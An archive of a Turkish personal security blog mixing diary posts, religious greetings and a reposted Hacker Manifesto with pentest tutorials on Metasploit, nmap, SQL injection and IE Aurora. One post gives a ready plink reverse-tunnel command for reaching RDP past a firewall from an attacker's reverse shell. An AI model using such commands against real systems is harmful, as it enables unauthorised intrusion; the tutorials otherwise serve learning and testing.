mrtskr.blogspot.com | Murat ŞEKER

Eringenlik ve Ben

2012-01-28T15:00:00.000-08:00

Konuya nereden girsem, nasıl başlasam bilemiyorum ama kabul ediyorum "Murat!! Eringensin abi eringen" diyenlere ben de "Haklısın abi eringenim ama nabayım ?" demekten başka birşey gelmiyor aklıma. Hep birşeyleri erteliyorum "amaan nede olsa yarın zaman bol hallederim" diyorum fakat bugün "oyun oynarken" düşünme fırsatı buldum (evet oyun oynarken yanlış okumadın sayın okur" Niye bu eringenlik? Kendime bu soruyu yönelttim ve güzelde bir cevap buldum. Sadece "Bıkkınlık" hani birşeyleri istersin, çabalarsın ucu görünür daha sonra kaçar gider ya işte buda böyle birşey. Ama suç kimde ?? Tabiki bende.. İstediğim şeyleri elde edemediğimi daha doğrusu yeterince çabalamadığımı farkedince kendime bir tokat attım (gerçekten) arkadaşım "Nabıyon lan manyak" diyince kendime geldim. "ya abi hebe hube" derken yeni bir karar aldım. Hayatı ıskalamaya gelmez. Birşeyi istiyorsan çabalayacaksın, Durmadan çalışacaksın başka çaresi yok !! Hadi bakalım Murat göreyim seni...

Tema

2012-01-11T11:17:00.000-08:00

İlk iş olarak blogum için tema aradım ama internette istediğim gibi birşey bulamadım malesef. E iş başa düştü biraz css biraz blogger değişkenleriyle bu iş halolur diye düşünüyorum :) Hadi hayırlısı.

Bilgi İşlem ? ^^

2011-12-30T07:06:00.001-08:00

Merhaba.
Yaklaşık 6 Aydır Çalıştığım Kars Belediyesi'nden Geçtiğimiz Hafta Çarşamba Gününden Beri Ayrıldım. Sebebi Karışık ve Yeni İş Arayışları İçerisindeyim. E İş Yokken Blogla Biraz İlgilenmem Gerek Değil mi ? :)

Metasploit 1 - Test Lab Kurulumu

2011-09-04T06:39:00.000-07:00

METASPLOİT 1 - Test Lab Kurulumu

Merhaba
Uzun Zamandır Kafamdaydı Metasploit'in Herşeyini Anlatacak Bir Video Serisi. 1. Videoyu Bitirdim 2. Ne Zaman Gelir Net Tarih Veremiyorum Ama Kesin Gelecek..

Bu Videoda Metasploit Hakkında Kısa Bilgi Verdikten Sonra Test Lab Kurulumunu Anlattım. Video Seslidir..

Videodaki Konular ;
Metasploit Nedir ?
Vulnerability, Exploit, Payload Kavramları
Test Lab Kurulumu

Videoda Framework'un Geç Yüklenmesinden Dolayı Hata Meydana Geleceğini Tahmin Etmiştim. Bendeki Hatayı Alanlar Framework'u Silip Tekrar Yüklerseler Sorun Düzelir (Bende Öyle Düzeldi)
Aynı Zamanda SQL Serverın Bir Ayarınıda Eksik Anlatmışım;

TCP/IP Sekmesindeki Listen All'u NO Yapın..
Videoyu Vimeo'ya Upload Ettim.

Vimeo Link ;
http://www.vimeo.com/28572884
Videodaki Programlar ;

Net Framework 2.0 : İndir
SQL Server Express 2005 : İndir
SQL Server Management Studio Express : İndir
Web Application : İndir

Soru ve Sorunlarınızı Buradan veya Mail İle Paylaşabilirsiniz. Elimden Geldiğince Cevaplamaya Çalışacağım..

Metasploit PostgreSQL Kurulumu

2011-08-26T07:55:00.000-07:00

Merhabalar
Bir Önceki Yazımda Makale Şeklinde Anlatımının Linkini Vermiştim Ama Hatalarla Dönen Mail'ler Gördüm Ben de Farklı Yöntemle (Kendi Kullandığım) Anlatımını Videoya Çektim.. Hostname'i zero Olarak Değiştiğim İçin Birkaç Yerde Hata Var Siz Onlara Aldırış Etmeyin.. Videoyu Alttan İzleyebilirsiniz..

Metasploit & Kafayı Yeme Noktası

2011-07-15T01:06:00.001-07:00

Merhabalar..
Malum Tekrar Aktif Olarak Bilgisayar Dünyasına Adım Attım. Hem Metasploitteki Eski Bilgilerimi Tazelemek Hem de Geçmişteki Bir Projemi (Metasploit Hakkında Detaylı Makale ve Videolar) Tekrar Hayata Geçirmek Amacıyla BT5i İndirdim (5i çıkmış :D). Herneyse VMWare'e BT5'i Kurdum Kendime Göre Ayarlarını vs Yaptım ve Büyük Bir Heyecanla Konsola "./msfconsole" Yazdım Tabi cd /pentest/exploits/framework3 yazdıktan sonra :)..

Eskiden Çok Hoşuma Giden db_autopwn 'i Denemek İstedim. http://www.blogger.com/img/blank.gif"service mysql start" Komutunu Verdikten Sonra db_driver Yazdım Oda Ne ? "No Active Driver" Altta Yönergeler Vardı İyi Güzel Dedim Yaptım Ama Oda Pek İşe Yaramadı. Başladım İnternetten Araştırmaya Ortalıkta ADam Gibi Birşey Yok. Sonra CEHTurkiye'deki Ozan UÇAR'a mail attım Oda PostgreSQL Kullandığını, Kısa Zamanda Döküman Yazacağını Söyledi. Ama Benim Kısa Zamanım Yoktu :) Herneyse PostgreSQL Hakkında Birşeyler Araştırdım ve Kurduktan Sonra İçim Gayet Rahatladı. PostgreSQL Nasıl kurulur vs Bunlar Hakkında Bilgi Vermeyeceğim Çünkü Benim Anlatacaklarımdan Daha Fazlası Aşağıda Vereceğim Linkte Mevcut.. Şimdiden Sömürün :))

http://www.cehturkiye.com/index.php/2011/07/11/metasploit-autopwn-ile-otomotik-pentest/metasploit-autopwn-ile-otomotik-pentest.html

Hade Kolay Gele

Nerelerdeyim ?

2011-07-14T03:57:00.001-07:00

Aslına bakarsanız nerelerdeyim, ne yapıyorum, ne yaptım ben de bilmiyorum malesef. Bazen kendimi kaybediyorum bazende tekrar buluyorum. Ama bulduktan sonra bir türlü dikiş tutturamıyorum kaçıyor benliğim benden:) neyse uzatmayayım. Evet yaklaşık "1" yıldır blog'a birşeyler karalamıyorum. Hatta bırakın blog'u bilgisayardan o kadar soğumuştumki oturasım yoktu. Oturduğum zaman ya msn,facebook ile uğraşıyordum ya da fizy'den mp3 dinliyordum. Peki 1 yıl içinde ne oldu ne bitti blog'umu takip edenlerin hiçbiri bilmiyor hatta sanaldan arkadaşlık yaptığım insanların çoğuda bilmiyor. Devamı yazısına tıklayında biraz hitim artsın :P

Son 7 ayda hayatımda köklü değişiklikler yaptım daha önceden Artvin'in Ardanuç ilçesinde yaşıyordum Ocak ayının 6sı gibiydi sanırım yada öyle bişe ama 10'unu geçmemişti eminim :D Artvin'den ilişkiyi kestikten sonra 2 günlük İstanbul maceram oldu ordan Giresun ve Memleketime gittim. Memleketimde tanıdık bir abimle CD/DVD dükkanı açtık (açtık diyorsam kurulu düzendi sadece bakacak birisi lazımdı) evet düşündüğünüz gibi KORSAN (karşıyım ama para için mecburdu hayat zor..) orada 1 hafta siftah yapamadıktan sonra (evlere internet geldi mertlik bozuldu :D) baktık olmayacak kapattık dükkanı. Sonra tekrar Giresun'a gittim,en son durağım ve hala bulunduğum (Mart Ayında) yer KARS'ta yaşıyorum. İlk geldiğim zaman bir kırtasiyede işe başladım 2 ay ki sürede Kars'a tam anlamıyla yerleştim. Derken kırtasiye ile anlaşamamaya başladım artık bağlar kopmak üzereydi. Derken burda Kent Konseyi Kadın Meclisi başkanı tatlımı tatlı iyimi iyi bir hanımla arkadaşım vasıtası ile tanıştım. Şansıma onlarada bilgisayarcı lazımmış :) Erzincan'da eğitim varmış gidermisin dediler hem tatil yapmak adına hem de birşeyler öğrenmeyi umarak kabul ettim. Tabi Erzincan'a gitmeden 1 gün önce müfredat bize mail ile bildirildi müfredatı gördükten 30 dk sonrasını hatırlamıyorum. Çünkü bildiğim şeylerdi. 1 Hafta Erzincan'da eğitim gördükten sonra Kars'a geri döndüm (bu arada kırtasiyedeki işimden ayrıldım) yine o tatlı ablam sayesinde Belediye Başkanı ile tanıştım belediyede "belki" iş bulurum diye CV bıraktım ablamda sağolsun işlemleri hızlandırdı derken 3 Hafta içinde yani bu yazıyı yazdığım tarihten 1 hafta önce Kars Belediyesi'nin Bilgi İşlem Biriminde çalışmaya başladım. Ne kadar maaş alacağım ne yapacağım pek bilgim yok ama zamanla hereşyi öğrenirim :). Bu yazıyıda hem onları bilgilendirmek hem de tekrar bilgisayara ısınmaya başladığımı söylemek için yazdım :) hadi hayırlısı diyelim.. Açığım çok. Dolayısıyla çok çalışmam lazım ne demiş Sakıp SABANCI : Çalışmak, Çalışmak, Çalışmak...

SSH Tünelleme İle Firewall Bypass

2010-08-03T01:32:00.000-07:00

İçerik
Bu Makalede SSH Tünelleme Yapılarak Firewall Arkasındaki Uzak Masaüstü Protokolüne Erişimin Nasıl Gerçekleştirileceği Anlatılmıştır.

SSH Nedir ?
SSH (Secure Shell Kısaltması) İki bilgisayar Arasında Güvenli Bağlantı Oluşturmak İçin Kullanılır. SSH Komut Satırı Arayüzü Kullanır. SSH’e Güvenli Telnette Denilebilir.
SSH Hakkında Detaylı Bilgi İçin Buradan Faydalanabilirsiniz.

SSH Tünelleme (SSH Tunneling)
Eğer İçeriklere Ulaşmayı Engelleyecek Bir Yazılım/Donanım (Firewall) Varsa; SSH İle Bir Tünel Oluşturulup (Server-Client) Gelen Bağlantılar SSH’e Yönlendirilebilir. Böylelikle Yönlendirilen Sisteme Gönderilen İstekler Servera Gidiyormuş Gibi Görünür ve Cevaplanır.

SSH Tünelleme İle Güvenlik Duvarı Atlatma (Firewall Bypass)

Senaryo
Saldırgan : Uzak Masaüstü Yapacağı Sisteme Erişmiştir (Meterpreter, Reverse Shell). Bu Makalede Reverse Shell Baz Alınacaktır.
Hedef : Router / Firewall NAT Arkasında ve Uzak Masaüstü Portuna Gelen Bütün Bağlantı İsteklerini Engelliyor (Sadece Belirli IP ’ler)
Amaç : Hedef Sisteme Uzak Masaüstü Bağlantısı Yapmak

Kullanılan Araçlar
Plink : SSH İstemcisi
Backtrack Live CD : Güvenlik Araçlarının Bulunduğu Linux İşletim Sistemi

Saldırgan IP : 192.168.52.129 > BackTrack Linux
Hedef IP : 192.168.128.131 > Windows

SSH İstemcisi Plink Upload Ettikten Sonra SSH Tüneli Oluşturalım;

Komut ;
plink -P 22 -l root -pw zero -C -R 3389:localhost:3389 192.168.52.129

Yani;
plink -P "ssh srv port" -l "ssh svr user" -pw "ssh svr pass" -C -R "yerel port":localhost(127.0.0.1):"uzak port" "ssh svr ip"

Parametreler;
-p : Port
-l : SSH Kul.
-pw : Şifre
-C : Sıkıştırma
-R : Port Yönlendirme (Uzaktan Yerele)

ve Bingo !

RDP Emrinizdedir.

Tatil(!)

2010-07-21T13:07:00.000-07:00

Merhabalar Uzun Zamandır Blog'a Hiçbirşey Yazmamıştım 15 Gün Önce Memleketime Gittim Akraba, Akran Ziyaretleri vs Derken Geri Döndüm Bundan Sonra Blogla Daha Çok İlgileneceğim Şimdiden Duyurulur :)

Microsoft Internet Explorer "Aurora" Memory Corruption Vulnerability

2010-01-21T11:43:00.000-08:00

Uzun Zamandır Yazmadım Yazmadım Şimdi Yazıyorum :)

Microsoft Internet Explorer "Aurora" Memory Corruption Vulnerability

Zafiyet Internet Explorer 4 SP4 ten Başlayarak 8’e Kadar (Internet Explorer 5.01 Service Pack 4 for Microsoft Windows 2000 Service Pack 4 Hariç) Tüm Sürümleri Etkilemektedir. Zafiyetle Kurban Bilgisayarında Uzaktan Kod Çalıştırılabilir. Zafiyetin Kullanımıyla İlgili Aşağıda Video Çektim Yalnız Metasploit’teki Exploit Sadece IE 6 Sürümlerinde Çalışmaktadır. Zafiyet Hakkında Detaylı ve İstismar Edilen IE Sürümlerini Öğrenmek İçin Buraya Tıklayınız.

NVD
SecurityFocus

Video ;

Zafiyeti Gidermek İçin;
Microsoft’un Yayınladığı Yamayı Kurmanız Yeterli. Yama Sayfasına Ulaşmak İçin Buraya Tıklayınız.

Bayram Tebriği

2009-11-28T05:59:00.000-08:00

Merhabalar
Tüm İslam Aleminin ve Blog Takipçilerimin(!) Kurban Bayramı Mübarek Olsun. Yedikleri Etler Kan ve Can Olsun :)

Hacker Manifestosu

2009-10-20T10:24:00.000-07:00

Benim Çok Hoşuma Giden Bir Yazı Ama Nedense Blog'da Yazmak Bugün Aklıma Geldi :)

-----------------

Bugün bir diğeri daha yakalandı.Boydan boya gazetelerdeydi''Bilgisayar suçu skandalında bir delikanlı tutuklandı''.''Banka hasarından sonra bir hacker tutuklandı''...

Lanet olası çocuklar.Hepsi birbirinin aynı.

Ama siz üç-parçalı psikolajinizle ve 1950'lerden kalma teknobeyninizle hiç bir hacker'ın gözlerinin arkasından baktınız mı?Onu bu kadar sert yapan,onu buna zorlayan,onu böylesine bir kalıbakalıba döken neydi diyehiç merak ettinniz mi?

Ben bir hacker'ım, dünyama buyrun...

Benim dünyam okul ile başlıyor...Birçok çocuktan daha akıllıyım, bize öğrettikleri bu saçmalık beni sıkıyor...

Lanet olası başarısızlar.Hepsi birbirinin aynı.

Orta okulda veya lisedeydim.Hocaların bir kesiri nasıl indirgendiğini anlatışlarını on beşici kez dinlemiştim.Onu anladım.''Hayır,Bay Smith, size ödevimi göstermedim, ben onu kafamdan yaptım...''

Lanet olası çocuk.Muhtemelen kopya çekti.Hepsi birbirinin aynı.

Bugün bir keşif yaptım.Bir bilgisayar buldum.Bir saniye,bu çok enteresan.Ne yapmasını istersem onu yapıyor.Eğer hata yaprsa,onu ben beceremediğimdendir.
Beni sevmediğinden değil...veya benden korktuğundan değil...veya benim çok akıllı bir fırlama olduğumu düşündüğünden değil... veya öğretmeyi sevmediğimden ve burada olmaması gerektiğini düşşündüğünden değil...

Lanet olası çocuk.Bütün yaptığı oyun oynamak.Hepsi birbirinin aynı.

Ve sonra oldu...''İşte bu...Benim ait olduğum yer burası...''Buradaki herkesi biliyorum...Onlarla hiç karşılaşmamış,hiç konuşmamış,onlardan bir daha ses çıkmayacak olsa dahi...Hepinizi tanıyorum...

Lanet olası çocuk.Telefon hattını yine meşgul ediyor.Hepsi birbirinin aynı.

İnanamayacaksınız ama hepimiz birbirimizin aynısıyız...Bizler okulda terslendik.Öğretecek birşeyleri olan azı bizi istekli öğrenciler olarak buldu.Fakat bu azı çöldeki damlacıklar gibiydi.

Bu bizim dünyamız şimdi...elekronun ve elektrik düğmesinin dünyası,bilgi aktarım hızının güzelliği.Karcı oburlar tarafından yönetilmeseydi pul kadar ucuz olabilecek, zaten var olan bir sistemi kullanılır hale getirdik ve siz bizi suçlu olarak ifşa ettiniz.Biz araştırdık...ve siz bize suçlu dediniz.Bilgiyi aradık...ve siz bize suçlu dediniz.Biz tenimizin rengi olmadan varolduk,milliyetsiz,hiç bir dine ait olmadan...ve siz bize suçlu dediniz.Atom bombası ürettiniz,savaşlara girdiniz,cinayet işlediniz,hile yaptınız ve bize yalan söylediniz ve bunların bizim yararımıza olduğuna inanmamızı sağlamaya çalıştınız ve biz hala suçluyuz.

Evet,ben suçluyum.Suçum merakımın bir parçası.Benim suçum insanları söyledikleri ve düşündüklerine göre yargılamak neye benzediklerine göre değil.Benim suçum sizleri daha akılcı kılmaktı,ki bu nedenden dolayı beni hiç bir zaman affetmiyeceksi- niz.

Ben bir hacker'ım ve bu benim manifestom.Bu bireyi durdurabilirsiniz ama hepimizi durduramazsınız...hepimizden öte, hepimiz birbirimize benziyoruz.

The Mentor(8 Ocak 1986)

Saldırılarda Uygulamalar Hedefleniyor

2009-09-26T12:45:00.000-07:00

İnternet'teki, zaafiyetleri irdeleyen bir araştırma, aslında tehditlerin pek de tahmin edilmeyen yerlerden gelebildiğini ortaya koyuyor.

Bilişim güvenlik eğitimi veren SANS Institute'ün bir araya getirdiği yakın tarihli araştırma, bilgi işlem müdürlerinin güvenlik önceliklerini sürekli yenilemeleri gerektiğine işaret ediyor. Risk değerlendirme şirketleri Tipping Point ve Qualys'in, 15 bin kuruluşu içine alan araştırması, sanılanın aksine saldırıların işletim sistemlerini değil, daha çok gerekli korumadan yoksun uygulamaları hedef aldığını gösteriyor. Bu, gerekli yamaların zamanında yapılması gereğini ortaya koyuyor.

Araştırmalar, kimi zaman şirketlerin kullandıkları işletim sistemlerindeki zaafiyetlere odaklanırken, uygulamaları gözden kaçırabildiklerine işaret ediyor. Yani, bir başka değişle esas koruma altına alınması gereken alan zayıf bırakılırken, saldırganların hedeflemedikleri işletim sistemleri kalın güvenlik duvarlarıyla korunuyor. Oysa, hatırda tutulması gereken hackerların kurumsal ve bireysel kullanıcıların davranışlarını sürekli izledikleri. Hackerlar, son zamanlarda işletim sistemlerine sürekli yama geliştirildiğini biliyorlar.

Bir diğer güvenlik önceliğini de web sunucuları üzerinde koşan uygulamalar oluşturuyor. Araştırmalar, tüm saldırıların yüzde 60'ının, bu tür web üzerinde paylaşılan uygulamalar aracılığıyla gerçekleştirildiğini gösteriyor. Uzmanlar, bu her iki tür saldırının da kullanıcılar için çok ciddi sonuçlar doğurabileceğini ifade ediyorlar. En çok hedef alınan uygulamalar arasında; Flash Playe, Acrobat Reader, Java, QuickTime'ın adları geçiyor.

Kaynak:turk.internet.com

Kaç Gün Geçti Aradan ? :)

2009-09-13T12:17:00.000-07:00

Uzun Zamandır Blog'la Uğraşmıyorum (Sanırım 1.5 Ay Falan) Blog Her Ne Kadar Yeni Olsada Günlük Tekil Ziyaretçim 10dan Fazla (Sanki Çokmuş Gibi Ama Mutlu Ediyor :P Bazen Ufak Şeylerdende Mutlu Olmak Gerekiyor.) Bu Aralar Ne mi Yapıyorum Aslında Yaptığım Pek Birşey Yok Herşey Aynı Eskiden Linux Hastasıydım Bu Aralar Tekrar Merak Sardım ve Ubuntu (mmmm Tadından Yenmez) Kurdum 1-2 Hafta sonra Eski Formuma Kavuşacağıma İnanıyorum Başkaaa ha Birde Müzik Dinlemeye Her Zamanki Gibi Devam :)

Yalnızlık

2009-07-08T09:40:00.000-07:00

Anlatacaklarım var!
Vaaz vermek değil niyetim, duyduğumu söylemek.
Söylemeye değer şeyler duyuyorum zira….
Belki hayatı daha yaşanır kılmak için ya da belki sade, ama sade anlatmak için…
Sen anlat dedi Tanrı bana, anlaşılsın diye değil, hiçbir mükafat istemeden anlat…
Çünkü bir mükafattır artık bir anlatıcıya doğru düzgün anlaşılmak!

Sen anlat dedi…
Sen sade anlat!
Umudu hatırlatsın diye umutsuzluğu, çareye yol açsın diye çaresizliği anlat…
Ders verme dedi kimseye, çünkü hoca denmez öğrenmesini bitirene.
Çırakları olan bir çıraktır usta, olsa olsa…
Sen anlat dedi bana Tanrı, sen sade anlat…

Küçükken herkes akıllı, ben aptalım sanırdım.
Biraz büyüdüm; herkes aptal ben akıllıyım sandım.
Uzun zaman önce; “herkes kör, bir ben mi görüyorum?” diye sordum.
Akabinde; “bir ben görüyor, bir ben duyuyor olamam!” dedim, sorguladım.
Şimdi ise; sayesinde, hakikatin neresinde durdugumun farkındayım….
Hatırladım…

Hiç kitap okumayan bir adam niçin merak eder seneye yazılacak kıtapları?
Bu dünyada bile yaşamayi beceremeyen niçin merak eder diğer gezegenlerdeki hayatı?
Geçmiş ve bugün ne zaman bitirildi de gelecek sorgulanıyor?…
İşler hala kalleşçe hallediliyor ikili ve uluslararasi ilişkilerde…
Her ülkenin sınır komşuları dost ve kardeş düşman ülkeler…
Doğru düzgün top bile oynayamıyorlar kavgasız!
Oyunları savaş gibi görenler savaşı da oyun gibi görüyor elbet…
Aynı kadına sevdalananlar birbirini vuruyor, aynı şeyden nefret edenler can ciger arkadaş…
Bir şeyi, bir kadını, bir erkeği ya da bir ülkeyi sevmenin cezası ölüm bile olabiliyor bazı…

Gerisi de videoda Altan Erkekli’nin müthiş oyunculuğuyla…

Kaynak

MSSQL Injection Reverse Shell

2009-07-01T04:55:00.000-07:00

Merhaba
Birkaç Gündür Blog'a Yazı Yazmıyorum Gerek Bunun İntikamı Gerekse 4-5 Ay Önce Uğraştığım Ama Eringenliğim Sayesinde(!) Ancak 2 Gün Önce Video Çekebildiğim SQL Injection İle MSSQL Veritabanlarında Reverse Shell'e Düşme Olayını Anlattım. İyi Seyirler :)

Videoyu İzlemek İçin Vimeo Linki : http://www.vimeo.com/5406792
İyi Seyirler ve Eğlenceler :)

Regaib Kandiliniz Mübarek Olsun

2009-06-25T11:45:00.001-07:00

"Recep ayı Allah’ın ayı, Şaban benim ayım, Ramazan da ümmetimin ayıdır." (Aclûnî, Keşfu’l-Hafâ, 1/423)

Regaib Kandiliniz Mübarek Olsun.

Penetration Tester Olmak

2009-06-23T04:42:00.000-07:00

Daha önceden pek çok kişi zaten söyledi güvenlikçi olmak sadece birkaç teknik konuyu iyi bilmek ya da birkaç kitap okumak değil daha çok beynin nasıl çalıştığı, bir soruna nasıl yaklaşıldığı ve olaylara bakış açısı ile ilgili. Bunun yanında bir çok başka meslekte de gerektiği gibi gündemi takip etme, odaklanma ve havadaki kokuları alabilme de gerekli meziyetlerden.

Bir güvenlik uzmanının ya da daha spesifik olarak penetration tester’ ın bir dizi özelliğe ihtiyacı var. Bu özelliklerin bir kısmı teknik, ve teknik şeyler öğrenilebilir ama bir kısmı da doğuştan gelen huylar ve muhtemelen ne yaparsanız yapın öğrenemeyeceğiniz ya da gerçekten öğrenmesi seneler sürecek şeyler.

Konuyu burada hemen “güvenlikçi oılunmaz, güvenlikçi doğulur(!)” a bağlamak istemiyorum, çünkü durum bu değil. İddialara göre Mehmet Akif Ersoy demiş ki “Şiirin %5 ilham, %95 çalışmaktır”. Ben de bu şekilde düşünüyorum, dolayısıyla %5 + %95 e erişince Mehmet Akif Ersoy olunuyor.

Yazacaklarımın bazıları gerçekten ölümcül bazıları ise sadece işinizde daha iyi olmanızı sağlayacak şeyler.

* Güvenlikçi Olarak Yaşamak, Güvenlikçi Olarak Düşünmek
o Yapmak değil, yıkmak
o Kullanmak değil, Suistimal etmek
* Derinlemesine Bilgi
* Paranoya
* Tutku
* İletişim Becerisi
* Okuma

Penetration Testing, Güvenlik Uzmanı ve Vulnerability Assessment

Yazının detaylarına geçmeden önce bazı terimleri temiz şekilde ifade etmek gerekir.

Penetration Testing (Pen Test)
Bir sistemi dışarıdan genelde ekstra hiçbir ekstra bilgi sahibi olmadan güvenlik açıklarına karşı test etmek ve bu açıkları mümkün olduğu kadar exploit etmek.

Vulnerability Assessment (VA)

Aynı penetration testing gibidir ama açıklar exploit edilmez, burada dikkat edilmesi gereken bir nokta var ki Vulnerability Assessment daha çok false positive verecektir ve açığın gerçek etkisini ortaya koymayabilir.

Mesela test edilen sistemdeki Buffer Overflow açığı olan bir SMTP server varsa ama karşıdaki sistem x64 ise ve bu açık x64 da geçerli değilse Vulnerability Assessment bunu açık olarak direk kabul edecektir ama gerçekte bu açık exploit edilemeyeceğinden direk bir risk taşımamaktır. Buna rağmen eski versiyon bir yazılım bulundurmak genelde iyi bir fikir olmadığından VA’ ın sonuçları her şekilde işe yarayacaktır.

Güvenlikçi / Güvenlik Uzmanı

Güvenlik Uzmanı çok geniş bir terim genelde şu iki anlamda kullanılır:

* Bir sistemin güvenliğini sağlamadan sorumlu kişi.
* Güvenlik işini bilen kişi.

İroniktir ki genelde güvenlikçikler sistemleri korurlar Penetration Testerlar gibi saldırmazlar ama bu grubun ikisi de Güvenlikçi, Güvenlik Mühendisi, Güvenlik Uzmanı diye geçebilir.

Ek olarak bazı güvenlikçiler kendi sistemlerini test etmek için kendi içlerinden kendi sistemlerine saldırganmış gibi de test edebilirler. Bu kişiler genelde iki rolüde üstlenmiş olurlar. Not düşmek lazım bu aynı kendi programınızda “bug” aramak gibidir, yani muhtemelen iyi sonuçlar vermeyecektir. Yazılımın sahibi olarak yazılımın zaten doğru oldu varsayımı ile yola çıktığınızdan genelde önünüzdeki sorunları bile göremeyeceksinizdir.
Güvenlikçi Olarak Düşünmek

Polisiye filmlerdeki klasik muhabbetlerden biri “profiling” dir yani saldırganın profilini çıkartabilmek. Buradaki en büyük klişe ise bir dedektifin saldırgan gibi düşünmesidir. Ne kadar klişe olsa da bu gerçekten saldırgana ulaşmanın en iyi yoludur ve güvenlikçi de aynı periyoddan çok daha güçlü şekilde geçer.

Çünkü bir polis gerçekte saldırgana ulaşmak için kimseyi öldürmez ama güvenlikçi siteye girer, exploit eder, database’ i indirir, reverse shell’ ine erişir. Gerçekten suçu işler, doruğa çıkar ve iner. Bu gereksinim güvenlikçinin içerisinde saldırgan kimliğinin bire bir yaşamasını sağlar.

Bilinen bir gerçek bir çok büyük güvenlik firmasında çalışan kişilerin eski suçlu hackerlar olduğudur.

Örnek isterseniz Kevin Mitnick’ in kendisi ya da eski @stake’ in L0pth Heavy Industries hacker grubunda gelen tayfası güzel bir örnek olacaktır. Bu örneklerin yanında diğer bir çok benzer güvenlik sektöründe çalışan kişinin de karanlık bir mazisi vardır. Bu arada not düşmek gerekir ki bu furya değişiyor, yazının ilerisinde ona değineceğim.

O zaman güvenlikçi saldırgan gibi düşünmelidir, Saldırganın motivasyonu nedir?

* Para,
Karşıdaki sistemi kırıp elde edeceği getiri (Kredi Kartı vs.)
* Şan / Şöhret,
Cyber Grafiti veya benzeri gösteriler, Saldırgan sistemi kırabildiğini tüm dünyaya gösterir
* Ego Tatmini,
Saldırgan karşıdaki sistemi kırıp kendisinin sistemin geliştiricilerinden daha iyi olduğuna inandırır, ek olarak kırılamayanı kırmış yeni bir şey yapmıştır.

Peki aynı durumda penetration tester ne yapmaktadır, onun motivasyonu nedir?

* Para,
Sistemi kırmak, kontrolleri geçmek güvenlikçinin pozisyonun koruması ya da daha iyi bir tester olup daha çok maaş alması demek.
* Şan / Şöhret,
Konu ar-ge olunca durum tamamen aynıdır, güvenlikçi yayınladığı yeni bir bir makale, araştırma yazısı ile o çevrede ünlenecektir, aynı şekilde saldırının başarısı ile de firma ya da kendi içerisinde bulunduğu grup içerisinde ünlenecektir.
* Ego Tatmini,
Güvenlikçi bu noktada saldırgan ile birebir aynı duyguları paylaşır.

Görüldüğü üzere güvenlikçi ile saldırgan tamamen aynı duygular içerisindedir, dolayıyla penetration tester’ lar dünyadaki saldırgan rolünü direk olarak oynayan sayılı mesleklerin birini icra etmektedirler.

Yazar : Ferruh MAVİTUNA

Sistemdeki Çalışan Servislerin Tespit Edilmesi

2009-06-21T04:34:00.000-07:00

Merhaba
İnternetteki veya Kendi Networkunuzdaki Servislerin Tespit Edilmesini İstiyorsanız Nmap'in -sV Parametresini Kullanabilirsiniz.
Örnek Komut ;

root@bt# nmap -sV ipno

Çıktı ;

Starting Nmap 4.85BETA8 ( http://nmap.org ) at 2009-06-21 14:31 GTB Yaz Saati
Interesting ports on ip (ip):
Not shown: 985 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp qmail smtpd
53/tcp open domain ISC BIND 9.3.3rc2
80/tcp open http Apache httpd 2.2.3 ((CentOS))
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2004)
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
465/tcp open ssl/smtp qmail smtpd
993/tcp open ssl/imap Courier Imapd (released 2004)
995/tcp open ssl/pop3 Courier pop3d
1720/tcp filtered H.323/Q.931
3306/tcp open mysql MySQL 5.0.45
8443/tcp open http Apache httpd
Service Info: Host: localhost.localdomain; OS: Unix

Service detection performed. Please report any incorrect results at http://nmap
org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.86 seconds

İyi Çalışmalar.

SQL Injection Attacks & Security

2009-06-19T09:44:00.000-07:00

SQL Injection Attacks & Security

İçindekiler :
1. Giriş
2. SQL Injection Nedir ? Neden Kaynaklanır ? Etkisi Nedir ?
3. Açığı Basitçe Exploit Etmek
>> Login Bypassing
4. SQL Injection Açığı Bulmak
>> String Veri
>> Numerik Veri
4. SQL’de Bazı İfadeler ve Kullanımları
>> SELECT İfadesi
>> INSERT İfadesi
>> UPDATE İfadesi
>> DELETE İfadesi
5. SQL Injection Tipleri
>> URL Injection
>> Form Injection
>> Blind Injection
6. UNION Operatörü
7. ODBC Hatalarından Faydalanarak Açığı Exploit Etmek (Sadece MSSQL)
>> Tablo ve Kolonları Öğrenmek
>> İşe Yarayan Bilgileri Almak
>> Kayıt İlerletme
8. Açığı Database Tiplerine Göre Exploit Etmek (MSSQL, Oracle)
>> MSSQL
>> Oracle
9. SQL Injection Güvenliği
10. Referanslar
11. Bitiş

1. Giriş
SQL Injection, Günümüz Web Uygulamalarında Sıkça Rastlanan Güvenlik Açıklarından Birisidir. Bu Dökümanda Okuyuculara Bir Saldırgan Gibi Düşünüp; SQL Injection Açıklarını Nasıl Sömürdüğünü ve Bu Saldırılara Karşı Alınabilecek Önlemler Anlatılmaktadır.

2. SQL Injection Nedir ? Neden Kaynaklanır ? Etkisi Nedir ?
• SQL Injection Nedir ?
Injection Kelime Anlamıyla Eklemek, Enjekte Etmek Anlamına Gelmektedir. SQL Injection İse SQL Sorgularının Dışardan Müdahale İle Manipule Edilmesiyle Zararlı Verilerin Eklenmesidir.Dynamic Web Applications (Dinamik Web Uygulamalarında) Genelde Bir Web Uygulaması, Arka planda Çalışan Bir Veritabanı ve Bu Veritabanıyla Web Uygulaması Arasında Bilgi Alışverişini Sağlayan SQL Komutları Vardır. Web Uygulamalarında Herhangi Bir Form veya URL Aracılığıyla Bilgi Alışverişi Yapılır. Bu İşlem Yapılırken Web Uygulamasıyla Etkileşimli Veritabanı Üzerinde Veri Alışverişi İçin SQL Sorguları Kullanılır. Bu SQL Sorgularıyla Veritabanına Veri Eklenir, Güncellenir, Silinir. Saldırgan Bu SQL Sorgularını Değiştirerek veya SQL Sorgusuna Kendi Zararlı Sorgusunu Ekleyerek Veritabanı Üzerinde Zararlı Sorgular Çalışır. Tabi Sadece Veritabanından Bilgi Çekmek, Eklemek Amacıyla Kullanılmaz. Sistem, Veritabanı ve Uygulama Yetkilerine Göre Sistemi Tamamen Devredışı Bırakabileği Gibi Aynı Ağda İnternete Erişimi Olan (Olmayan) Makineleri Ele Geçirebilir. ve Saldırgan Bu Makineleri Kullanarak İstediği Saldırıyı Yapabilir.
• Neden Kaynaklanır ?
